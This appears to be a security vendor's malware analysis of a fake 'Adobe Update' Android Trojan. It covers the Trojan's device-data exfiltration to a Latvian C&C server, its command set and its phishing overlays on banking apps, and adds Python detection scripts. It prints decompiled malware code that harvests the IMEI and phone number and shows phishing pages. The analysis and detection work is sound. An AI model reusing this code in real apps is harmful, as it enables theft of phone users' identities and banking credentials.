Fake Adobe Flash App Evades Most Anti Virus Detection, Manipulates Phone by Command & Control Server in Latvia

— Trustlook Research Team

Smartphones have spread into every corner of the world. After years of rapid growth, their popularity and usefulness now rival those of personal computers. Beyond calling and texting, more and more people do their daily banking on a smartphone. With that computing capability available, some traditional malware is shifting to the smartphone: it compromises the device, changes the phone's behaviour, and takes instructions from a remote attacker to steal the user's information.

One such example is a newly discovered malicious app named "Adobe Update", with the package name "droid.invisible". It is a phishing Trojan that targets the Android platform.

The sample's MD5 is D8616CDD54154B06A5E4D9D5B2A605E5.
The package icon is:


On VirusTotal, only 3 of 57 antivirus vendors detected it when it was first submitted.


The malware hides its own developer certificate information behind the name of a reputable enterprise:



By contrast, the official com.adobe.reader app in Google Play carries this correct developer certificate:


Upon installation, this malware presents the user with a misleading setup dialog box while replacing the default SMS app:


The app displays messages that entice the user to grant it device administrator rights, which it uses to maintain persistence on the system:


The app cannot be uninstalled by normal means:


The app communicates with a remote server and sends out critical personal information:

  • Country
  • Device model
  • IMEI
  • Network operator
  • Cell phone number
  • Malware bot ID
  • OS version
  • Device name
  • OS API level


The following decompiled code snippet demonstrates the behaviour above:


```java
// Decompiled from the sample; obfuscated class names (a, b, x, ...) are as emitted by the decompiler.
class /* class name not preserved in the listing */ implements Runnable {

    // Runnable requires run(); the method header itself was not preserved in the listing.
    public void run() {
        a.a.a.a.a locala = new a.a.a.a.a();   // obfuscated HTTP client
        x localx = new x();                    // obfuscated container for request parameters
        TelephonyManager localTelephonyManager = (TelephonyManager) this.a.getSystemService("phone");

        localx.a("id", localTelephonyManager.getDeviceId());                                   // IMEI
        localx.a("country", localTelephonyManager.getNetworkCountryIso());                     // country
        localx.a("opname", localTelephonyManager.getNetworkOperatorName());                    // network operator
        localx.a("osversion", System.getProperty("os.version") + "(" + Build.VERSION.INCREMENTAL + ")"); // OS version
        localx.a("osapilevel", Build.VERSION.RELEASE + "(" + Build.VERSION.SDK_INT + ")");      // OS API level
        localx.a("device", Build.DEVICE);                                                      // device name
        localx.a("model", Build.MODEL + " (" + Build.PRODUCT + ")");                           // device model
        localx.a("pnumber", localTelephonyManager.getLine1Number());                           // cell phone number
        localx.a("botid", "777");                                                              // hard-coded malware bot ID

        // Post the collected data to the C&C server; the URL string is empty in the listing,
        // and b is the obfuscated response callback.
        locala.a("", localx, new b(this));
    }
}
```
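The parameter names in the listing above are a stable fingerprint of the sample's check-in request. The following detection logic is an added example written for this post, not code from the sample or from Trustlook; it parses constructed proxy-style log lines (hosts, phone numbers and IMEI values are placeholders, not real indicators) and flags request bodies that carry the sample's parameter set.

```python
from urllib.parse import parse_qs

# Parameter names the decompiled sample posts to its C&C server (taken from the listing above).
BEACON_KEYS = {"id", "country", "opname", "osversion", "osapilevel",
               "device", "model", "pnumber", "botid"}
# The device identifier, phone number and bot ID must all be present for a match.
REQUIRED_KEYS = {"id", "pnumber", "botid"}


def parse_beacon(body):
    """Parse a form-encoded request body into single-valued fields."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def is_beacon(body, min_overlap=7):
    """True if the body looks like the sample's check-in request:
    all required keys present and at least min_overlap of the known keys."""
    keys = set(parse_beacon(body))
    return REQUIRED_KEYS <= keys and len(keys & BEACON_KEYS) >= min_overlap


def find_beacons(log_lines):
    """Scan constructed log lines of the form '<method> <host> <body>' and
    return (host, botid, imei) for every POST body that matches."""
    hits = []
    for line in log_lines:
        parts = line.split(" ", 2)
        if len(parts) != 3 or parts[0] != "POST":
            continue
        _method, host, body = parts
        if is_beacon(body):
            fields = parse_beacon(body)
            hits.append((host, fields["botid"], fields["id"]))
    return hits


# Constructed sample log lines; every host and value is a placeholder, not a real indicator.
SAMPLE_LOG = [
    "POST c2.example.invalid id=356938035643809&country=lv&opname=ExampleNet"
    "&osversion=3.4.0(ABC123)&osapilevel=4.4.2(19)&device=hammerhead"
    "&model=Nexus+5+(hammerhead)&pnumber=%2B37120000000&botid=777",
    "POST shop.example.invalid item=42&qty=1&country=lv",
    "GET news.example.invalid ",
]

if __name__ == "__main__":
    for host, botid, imei in find_beacons(SAMPLE_LOG):
        print(f"beacon to {host}: botid={botid} imei={imei}")
```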


Furthermore, the malware receives command instructions from the C&C server to perform various functions:

  • loop // wait for the next command
  • sms // send an SMS message
  • readsms // retrieve SMS messages and send them to the C&C server
  • ion // not implemented; only writes to the log file
  • ioff // same as above
  • recall // call back received numbers
  • fish // show an attacker-controlled web page when a specific app is found running in the foreground

The following decompiled code snippets show how the malware checks the received parameters and displays a phishing web page:

```java
// Command dispatcher: paramArrayOfByte[0] is the command name, [1] its payload.
if (paramArrayOfByte[0].equals("fish")) { // compare command name
    // hand the payload to the scanner service
    this.b.a.startService(new Intent(this.b.a, InjectionScanner.class).putExtra("data", paramArrayOfByte[1]));
}
```



```java
public class InjectionScanner extends Service {

    int a = 0;   // set to 1 once an injection has been shown
    String b;    // raw "fish" payload received from the C&C server

    public String a() {
        // get the foreground running process name
        return ((ActivityManager.RunningAppProcessInfo) ((ActivityManager) getSystemService("activity"))
                .getRunningAppProcesses().get(0)).processName;
    }

    public void a(String paramString) {
        // start the scanning thread (obfuscated class g) with the payload;
        // the decompiler reused the parameter slot for the Thread object here
        Thread localThread = new Thread(new g(this, paramString));
        localThread.start(); // the start call is implied; it was not preserved in the listing
    }

    public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2) {
        this.b = paramIntent.getStringExtra("data");
        // ... (remaining lines not preserved in the listing)
        return paramInt1;
    }
}
```


```java
// Inside the scanner thread (class g): localJSONObject is the parsed "fish" payload,
// i indexes its keys and j the "apps" array of each entry.
if (this.b.a().equals(localJSONObject.getJSONObject(localJSONObject.names().getString(i))
        .getJSONArray("apps").getString(j))) { // compare the foreground app name with a received string
    Intent localIntent = new Intent(this.b, InjectionActivity.class);
    localIntent.putExtra("injection", localJSONObject.names().getString(i));
    // ... (lines not preserved in the listing)
    this.b.a = 1;
}
```



```java
// InjectionActivity: hosts the WebView that shows the phishing page.
protected void onCreate(Bundle paramBundle) {
    // ... (lines not preserved in the listing)
    // the decompiler reused the Bundle parameter slot for the TelephonyManager
    TelephonyManager localTelephonyManager = (TelephonyManager) getSystemService("phone");
    Intent localIntent = getIntent();
    WebView localWebView = (WebView) findViewById(2131492971); // resource id of the WebView

    localWebView.setWebViewClient(new f(this, null));
    localWebView.setWebChromeClient(new e(this, null));
    // show the phishing web page; the leading URL string is empty in the listing,
    // and the device IMEI is appended to the received "injection" value
    localWebView.loadUrl("" + localIntent.getStringExtra("injection") + "&imei=" + localTelephonyManager.getDeviceId());
}
```



When a specific app, for example a banking app, is found in the foreground, the malware displays a phishing web page. The fraudsters persuade unsuspecting users to enter their financial details and harvest all of that information.
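The scanner loop above implies the layout of the "fish" payload: a JSON object whose keys are injection targets, each holding an "apps" array of package names. The following parser is an added example written for this post (not code from the sample or from Trustlook) for triaging a captured payload in a sandbox: it lists every targeted package and reproduces the scanner's matching decision. It assumes the keys are the phishing URLs, inferred from the activity appending "&imei=" to them; the sample payload is constructed with placeholder URLs and package names.

```python
import json


def parse_fish_config(data):
    """Parse the 'fish' command payload (the string passed as the "data" extra).
    Assumed layout, inferred from the decompiled loop:
        {"<injection key>": {"apps": ["<package>", ...]}, ...}
    Returns {injection_key: [package names]}; entries without an "apps" array
    yield an empty list rather than raising."""
    cfg = json.loads(data)
    targets = {}
    for key, entry in cfg.items():
        apps = entry.get("apps", []) if isinstance(entry, dict) else []
        targets[key] = [str(pkg) for pkg in apps]
    return targets


def matching_injection(targets, foreground_process):
    """Reproduce the scanner's decision: the first injection key whose app list
    contains the foreground process name, or None if no target is running."""
    for key, apps in targets.items():
        if foreground_process in apps:
            return key
    return None


def targeted_packages(targets):
    """Sorted list of every package name the configuration targets (triage/IoC output)."""
    return sorted({pkg for apps in targets.values() for pkg in apps})


# Constructed sample payload; URLs and package names are placeholders, not real indicators.
SAMPLE_FISH_DATA = json.dumps({
    "https://phish.example.invalid/login?bank=a": {"apps": ["com.examplebank.app", "com.examplebank.lite"]},
    "https://phish.example.invalid/login?bank=b": {"apps": ["com.otherbank.mobile"]},
    "https://phish.example.invalid/empty": {},
})

if __name__ == "__main__":
    targets = parse_fish_config(SAMPLE_FISH_DATA)
    print("targeted packages:", targeted_packages(targets))
    print("foreground com.otherbank.mobile ->", matching_injection(targets, "com.otherbank.mobile"))
```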

The C&C server is located in Latvia:



